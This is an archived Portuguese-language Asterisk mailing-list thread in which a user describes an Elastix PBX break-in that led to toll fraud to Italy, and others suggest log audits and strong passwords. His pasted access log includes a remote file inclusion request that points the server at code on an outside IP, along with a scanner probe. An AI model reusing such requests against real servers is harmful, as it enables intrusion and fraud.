[AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6

Gleidison Sampaio gleidison.sampaio em hotmail.com
Segunda Novembro 22 15:25:33 BRST 2010


é possivel limitar a quantidade de ligaçoes simultaneas por ramal?



Att;
Gleidison C. Sampaio

From: gleidison.sampaio em hotmail.com
To: asteriskbrasil em listas.asteriskbrasil.org
Date: Mon, 22 Nov 2010 13:23:47 -0400
Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6








Nielsen,
Cara, rodei tudo quanto é coisa na maquina do cliente, essa parte foi facil, até porque só tem uma maquina em cada filial, nao detectei nada, até porque tem um firewall que barra tudo quanto é acesso, mais enfim o fato é que eu gostaria de saber, o que posso fazer pra tornar mais seguro pra evitar essas invasões.



Att;
Gleidison C. Sampaio


From: nielsen em freesolutions.com.br
Date: Mon, 22 Nov 2010 13:51:04 -0300
To: asteriskbrasil em listas.asteriskbrasil.org
Subject: Re: [AsteriskBrasil]	RES: Duvida ( SEGURANÇA ) Elastix 1.6

Bom eles autenticaram numa boa ? Vc está utilizando senhas fortes ? provavelmente eles monitoraram seu server e conseguiram uma senha ... Muito estranho vc fez uma auditoria nos logs ? Pode ser que algum de seus clientes esteja com trojan, este enviou as informações e no meio delas foram os dados de autenticação.



Pensou nisso tudo ?

No final das contas é preciso a auditoria para identificar a origem da invasão.

Em 22 de novembro de 2010 13:40, Gleidison Sampaio <gleidison.sampaio em hotmail.com> escreveu:







Sim no Elastix 1.6
ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas durante a madrugada os caras arrebentaram de ligar.






















2010-11-21 21:14:01

XXXX00393396976261

SIP/TRUNK 

SIP/TRUNKANSWERED

1045

















Att;
Gleidison C. Sampaio






From: nielsen em freesolutions.com.br
Date: Mon, 22 Nov 2010 13:27:16 -0300
To: asteriskbrasil em listas.asteriskbrasil.org


Subject: Re: [AsteriskBrasil]	RES: Duvida ( SEGURANÇA ) Elastix 1.6

Opa, foi no seu ELASTIX 1.6?

Qual a posição que se encontra seu servidor voip na sua rede ?



Em 22 de novembro de 2010 13:20, Gleidison Sampaio <gleidison.sampaio em hotmail.com> escreveu:







Sidinei,
Obrigado pela Resposta, 
cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso.




/var/log/httpd/access_log
72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner"



72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1" 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"







Att;
Gleidison C. Sampaio









From: sidnei_rp em ig.com.br
To: asteriskbrasil em listas.asteriskbrasil.org




Date: Mon, 22 Nov 2010 14:00:10 -0200
Subject: [AsteriskBrasil] RES:  Duvida ( SEGURANÇA ) Elastix 1.6




Não, pois estão todas as linhas comentadas (é só um exemplo). 
 




De: asteriskbrasil-bounces em listas.asteriskbrasil.org [mailto:asteriskbrasil-bounces em listas.asteriskbrasil.org] Em nome de Gleidison Sampaio




Enviada em: segunda-feira, 22 de novembro de 2010 13:40
Para: Asterisk Lista
Assunto: [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6
 
Boa tarde Lista!




 
hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor




 
/etc/asterisk/users.conf
 
;[6000]




;fullname = Joe User
;email = joe em foo.bar
;secret = xxxx


;zapchan = 1
;hasvoicemail = yes
;vmsecret = xxxx


;hassip = yes
;hasiax = no
;hash323 = no
;hasmanager = no




;callwaiting = no
;context = international
 
 




 
 
Att;
 


Gleidison C. Sampaio
 
 




 		 	   		  


 		 	   		  


 		 	   		  
-------------- Próxima Parte ----------
Um anexo em HTML foi limpo...
URL: http://listas.asteriskbrasil.org/pipermail/asteriskbrasil/attachments/20101122/118829f5/attachment.htm 


Mais detalhes sobre a lista de discussão AsteriskBrasil